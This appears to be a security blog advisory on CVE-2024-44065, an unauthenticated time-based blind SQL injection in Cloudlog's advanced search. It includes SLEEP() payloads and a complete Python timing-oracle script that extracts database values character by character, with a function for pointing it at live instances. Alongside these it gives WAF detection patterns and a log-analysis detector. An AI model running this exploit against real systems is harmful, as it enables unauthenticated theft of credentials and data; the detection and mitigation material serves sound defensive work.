CVE-2024-44065: When a Logbook Search Becomes a Full Database Breach

Vulnerability Overview

CVE Name: Cloudlog Time-Based Blind SQL Injection via qsoresults Parameter

CVE ID: CVE-2024-44065

CWE ID: CWE-89 – Improper Neutralization of Special Elements Used in an SQL Command (SQL Injection)

Disclosure Date: December 2025


Severity & Risk Rating

CVSS v3.1 Score: 9.8 / 10
Severity: CRITICAL

CVSS Vector:
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H

Risk Breakdown

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Impact Type:
    • Full database disclosure
    • Data modification or deletion
    • Complete application compromise
    • Potential server takeover depending on database privileges

Overall Risk:
This is a fully remote, unauthenticated, critical SQL injection: anyone who can reach the advanced search endpoint can run queries against the backend database without logging in. Because the PR:N component carries much of the 9.8 score, confirm on your own deployment that the endpoint answers without a session when prioritising the fix.


Exploitability & Threat Status

Exploitability: Very High

Exploit Availability:

  • A public proof-of-concept (PoC) is available
  • The attack technique is simple, reliable, and reproducible
  • Exploitation does not require special tools beyond standard SQL injection testing utilities

Likely Threat Actors:

  • Opportunistic internet scanners
  • Automated botnets
  • Malicious researchers
  • Attackers targeting amateur radio and logging platforms
  • Ransomware operators seeking easy entry points

This vulnerability is especially dangerous because Cloudlog instances are typically self-hosted by individual operators and reachable directly from the internet, where opportunistic scanning finds them quickly.


Affected Product Details

Product: Cloudlog
Deployment Type: Self-hosted web application
Affected Version:

  • Cloudlog v2.6.15

Vulnerable Endpoint:

/index.php/logbookadvanced/search

Vulnerable Parameter:

qsoresults

Vulnerability Description

CVE-2024-44065 is caused by unsafe handling of the qsoresults parameter in the advanced logbook search: the value supplied by the client is placed into the SQL statement without parameterisation or validation.

Error messages are suppressed, so a malformed value produces no visible SQL error, but the backend database still executes whatever statement the injected text forms.

An attacker therefore uses time-based blind SQL injection: each request carries a condition wrapped in SLEEP(), and whether the response arrives late or on time reveals one true/false answer about the data.

Even with no error text and no query output on the page, that one bit per request is enough to read any value the application's database account can access, character by character, given time.


How the Vulnerability Can Be Exploited

Attack Prerequisites

An attacker only needs:

  • Network access to a Cloudlog instance
  • No authentication
  • No user interaction
  • No prior knowledge of the database structure

Exploitation Steps

  1. The attacker identifies a publicly accessible Cloudlog instance.
  2. A crafted request is sent to the advanced search endpoint.
  3. The qsoresults parameter is injected with a time-delay SQL payload.
  4. The database executes the injected query.
  5. The attacker compares the response time with that of a harmless baseline request; a consistent extra delay matching the SLEEP() argument confirms the injection.
  6. Each further request then answers one true/false question about the data, so over many requests the attacker can:
    • Enumerate database tables and columns (via information_schema on MySQL/MariaDB)
    • Extract sensitive data, one character or bit per request
    • Modify or delete records where the injection point or driver permits write statements (a time-based probe inside a SELECT on its own only reads)

Detection Payloads (Time-Based)

MySQL-style payload example:

qsoresults=1' AND SLEEP(5)-- -

Conditional time-based payload:

qsoresults=1' AND IF(1=1,SLEEP(5),0)-- -

If the response arrives about 5 seconds later than a baseline request with a harmless value, the parameter is vulnerable. When sent over HTTP the payload must be URL-encoded (the quote becomes %27, spaces become + or %20); -- - is used as the comment terminator because MySQL requires whitespace after --, and # would be cut off as a URL fragment in a GET request. The quoted form assumes the value lands inside a string literal; if it is concatenated into a numeric position, the leading quote breaks the statement instead, so also try the unquoted form (1 AND SLEEP(5)) and always compare against the baseline so that a slow server is not mistaken for a positive.
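The following is an added example (not Cloudlog's code and not the public PoC) that turns the inference described under "Vulnerability Description" and the payloads above into a working timing oracle: it measures a baseline, confirms the injection with a true and a false condition, and then recovers a value one character at a time by binary search over ASCII(SUBSTRING(...)). It assumes the search form is POSTed as application/x-www-form-urlencoded and that the value sits in a string context; the table and column names in the subquery are placeholders, since the advisory names no Cloudlog schema. FakeVulnerableServer is a constructed stand-in so the logic runs offline.

```python
"""Time-based blind SQLi oracle for the qsoresults parameter (added example).

Assumptions: form-encoded POST to the advisory's endpoint, string-context
injection, placeholder subquery. FakeVulnerableServer is constructed.
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "/index.php/logbookadvanced/search"  # from the advisory


def payload(condition: str, delay: int) -> str:
    """The page's conditional payload, with the condition filled in."""
    return f"1' AND IF({condition},SLEEP({delay}),0)-- -"


def http_send(base_url: str):
    """Build a send(body) -> seconds function that POSTs to a live instance."""
    def send(body: dict) -> float:
        data = urllib.parse.urlencode(body).encode()  # encodes ' ( ) and spaces
        req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT, data=data)
        t0 = time.monotonic()
        try:
            urllib.request.urlopen(req, timeout=60).read()
        except urllib.error.HTTPError:
            pass  # errors are suppressed server-side; only timing matters
        return time.monotonic() - t0
    return send


class TimingOracle:
    """Turns response delays into one boolean answer per request."""

    def __init__(self, send, delay: int = 5, samples: int = 3):
        self.send, self.delay = send, delay
        # Baseline: slowest of a few harmless requests, so ordinary load
        # is not mistaken for SLEEP().
        self.baseline = max(send({"qsoresults": "1"}) for _ in range(samples))

    def delayed(self, condition: str) -> bool:
        t = self.send({"qsoresults": payload(condition, self.delay)})
        return t - self.baseline >= 0.8 * self.delay

    def is_vulnerable(self) -> bool:
        # A true condition must delay and a false one must not; a merely
        # slow server fails the second half.
        return self.delayed("1=1") and not self.delayed("1=2")

    def extract(self, subquery: str, max_len: int = 64) -> str:
        """Recover the scalar result of `subquery` one character at a time.
        Binary search costs about 7 requests per character; SUBSTRING past
        the end returns '' whose ASCII() is 0, which ends the loop."""
        out = []
        for pos in range(1, max_len + 1):
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                if self.delayed(f"ASCII(SUBSTRING(({subquery}),{pos},1))>{mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            if lo == 0:
                break
            out.append(chr(lo))
        return "".join(out)


class FakeVulnerableServer:
    """Constructed offline stand-in: evaluates only the conditions the oracle
    above generates and returns the elapsed time a real server would show,
    without actually sleeping."""
    SECRET = "n0ta_real_hash"  # constructed value standing in for a DB cell
    _cond = re.compile(r"IF\((.+?),SLEEP\((\d+)\),0\)")
    _ascii = re.compile(r"ASCII\(SUBSTRING\(\((.+)\),(\d+),1\)\)>(\d+)")

    def __init__(self, vulnerable: bool = True, base: float = 0.12):
        self.vulnerable, self.base = vulnerable, base

    def send(self, body: dict) -> float:
        m = self._cond.search(body.get("qsoresults", ""))
        if not (self.vulnerable and m):
            return self.base
        cond, delay = m.group(1), int(m.group(2))
        if cond in ("1=1", "1=2"):
            truth = cond == "1=1"
        else:
            a = self._ascii.fullmatch(cond)
            pos, n = int(a.group(2)), int(a.group(3))
            ch = self.SECRET[pos - 1] if pos <= len(self.SECRET) else ""
            truth = (ord(ch) if ch else 0) > n
        return self.base + (delay if truth else 0)


if __name__ == "__main__":
    oracle = TimingOracle(FakeVulnerableServer().send)
    print("vulnerable:", oracle.is_vulnerable())
    # Placeholder subquery; a real engagement would walk information_schema first.
    print("leaked:", oracle.extract("SELECT password FROM users LIMIT 1"))
```

Against a live target replace the fake with `TimingOracle(http_send("https://host"))`; at roughly 7 requests of 5 seconds each per character, extracting a single hash takes a few minutes, which is why the detection section below looks for clusters of equally slow requests rather than one slow hit.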


Impact Scenarios

Successful exploitation can lead to:

  • Disclosure of:
    • User credentials
    • API keys
    • Logs and operational data
  • Modification of logbook entries
  • Deletion of entire databases
  • Persistence via database-stored payloads
  • Potential remote code execution if database permissions are misconfigured

Detection & Monitoring Guidance

What to Look For

HTTP Logs

  • Repeated requests to: /index.php/logbookadvanced/search
  • Suspicious SQL keywords in the qsoresults value, compared case-insensitively after URL decoding:
    • SLEEP
    • BENCHMARK
    • IF(
    • SELECT
    • UNION
  • Note that Apache and Nginx access logs record only the request line: if the search form is submitted as a POST body, the qsoresults value never reaches the access log, and only a WAF, a reverse proxy with body logging, or application-level logging will show it.

Behavioral Indicators

  • Repeated requests to the search endpoint whose response times cluster around a fixed delay (about 5 seconds for the payloads above) while other requests from other clients stay fast
  • Parameter values containing SQL punctuation (', ", --, #), possibly URL-encoded
  • Bursts of requests to a single endpoint from an IP with no prior session activity

Example WAF / IDS Detection Rules

Generic SQL Injection Keyword Detection

(?i)qsoresults=[^&]*(sleep|benchmark|union|select|if\s*\()

Apply the pattern to the URL-decoded parameter (the original, case-sensitive form misses SLEEP written as sleep and a quote sent as %27), and anchor it to the qsoresults value rather than the whole request line so that keywords in other fields do not trigger it.

Time-Based SQL Injection Heuristic

  • Alert when one client IP produces several responses from the search endpoint with near-identical latency close to a round number of seconds
  • Alert when latency rises only for requests whose qsoresults value contains punctuation or SQL keywords, and returns to normal for plain numeric values

Log Sources to Monitor

To detect exploitation attempts, monitor:

  • Web Server Access Logs (Apache / Nginx)
  • Application Logs (Cloudlog PHP logs)
  • Database Logs (slow query log with long_query_time set below the delays attackers use; MySQL's default of 10 seconds would never record a SLEEP(5) probe; the general query log if its write load is acceptable)
  • WAF Logs (if deployed)
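As an added example (not Cloudlog's or Aegiron's tooling), the two detection rules above run over constructed Apache access log lines. It assumes a LogFormat of `%h [%t] "%r" %>s %b %D`, where %D is the response time in microseconds; add that field if your format lacks it. The keyword rule is the corrected, case-insensitive version applied after URL decoding, and the sample deliberately mixes a GET probe, which the keyword rule catches, with POST probes, which only the timing rule can see.

```python
"""Access-log detection for CVE-2024-44065 probes (added example).

Assumes Apache-style lines:  %h [%t] "%r" %>s %b %D  (%D = microseconds).
SAMPLE_LOG is constructed traffic, not a real capture.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote_plus, urlsplit

ENDPOINT = "/index.php/logbookadvanced/search"

# The page's keyword rule, corrected: case-insensitive, applied to the
# decoded qsoresults value only.
SQLI_KEYWORDS = re.compile(r"sleep|benchmark|union|select|if\s*\(", re.IGNORECASE)

LINE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<us>\d+)$'
)

# Constructed sample: a legitimate search, a GET probe carrying the page's
# payload, three POST requests that each took ~5 s, and an unrelated page.
SAMPLE_LOG = """\
198.51.100.4 [12/Dec/2025:10:14:58 +0000] "GET /index.php/logbookadvanced/search?qsoresults=25 HTTP/1.1" 200 8120 143211
203.0.113.7 [12/Dec/2025:10:15:01 +0000] "GET /index.php/logbookadvanced/search?qsoresults=1%27+AND+SLEEP%285%29--+- HTTP/1.1" 200 512 5012345
203.0.113.7 [12/Dec/2025:10:15:07 +0000] "POST /index.php/logbookadvanced/search HTTP/1.1" 200 512 5009871
203.0.113.7 [12/Dec/2025:10:15:13 +0000] "POST /index.php/logbookadvanced/search HTTP/1.1" 200 512 5011002
203.0.113.7 [12/Dec/2025:10:15:19 +0000] "POST /index.php/logbookadvanced/search HTTP/1.1" 200 512 5010450
198.51.100.4 [12/Dec/2025:10:15:22 +0000] "GET /index.php/logbook HTTP/1.1" 200 22310 98020
"""


def suspicious_value(value: str) -> bool:
    """Keyword rule on one parameter value. Decoding once more here also
    catches double-encoded evasion (%2527 -> %27 -> ')."""
    return SQLI_KEYWORDS.search(unquote_plus(value)) is not None


def parse_line(line: str):
    """Split one access-log line into fields; None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["us"] = int(rec["us"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query)  # decodes %27 and + for us
    return rec


def analyse(lines, slow_seconds: float = 4.0, repeats: int = 3):
    """Return (rule, ip, detail) alerts for the advisory's two indicators:
    SQL keywords in qsoresults, and repeated slow responses from one IP.

    Keyword matching only ever sees GET query strings; a POST body is not in
    the access log, which is why the timing rule is needed at all."""
    alerts = []
    slow_by_ip = defaultdict(int)
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or rec["path"] != ENDPOINT:
            continue
        for value in rec["params"].get("qsoresults", []):
            if suspicious_value(value):
                alerts.append(("sqli-keyword", rec["ip"], value))
        if rec["us"] >= slow_seconds * 1_000_000:
            slow_by_ip[rec["ip"]] += 1
            if slow_by_ip[rec["ip"]] == repeats:  # fire once per IP
                alerts.append(("timing", rec["ip"],
                               f"{repeats} responses over {slow_seconds}s"))
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG.splitlines()):
        print(alert)
```

The threshold of 4 seconds sits just under the 5-second SLEEP() the public payloads use; tune `slow_seconds` to your instance's normal search latency, and feed the same `suspicious_value` check the decoded POST body from a WAF or ModSecurity audit log to close the gap the access log leaves.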

Mitigation & Remediation

Immediate Actions

  • Restrict public access to the Cloudlog instance where possible (IP allowlist, VPN, or HTTP authentication in front of the application)
  • Apply WAF rules that match the qsoresults value after URL decoding and case folding, not the raw request line
  • Monitor access, application, database and WAF logs for the indicators listed above

Official Patch

The vulnerability has been addressed by the Cloudlog maintainers.

Official Patch / Upgrade Location:
https://github.com/magicbug/Cloudlog

Administrators are strongly advised to upgrade immediately and verify that no unauthorized database activity occurred prior to patching.


Final Risk Summary

CVE-2024-44065 represents a worst-case web application vulnerability:

  • Fully unauthenticated
  • Remote
  • Critical severity
  • Publicly exploitable
  • Impacts confidentiality, integrity, and availability

Any exposed Cloudlog v2.6.15 instance should be considered at high risk until patched.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.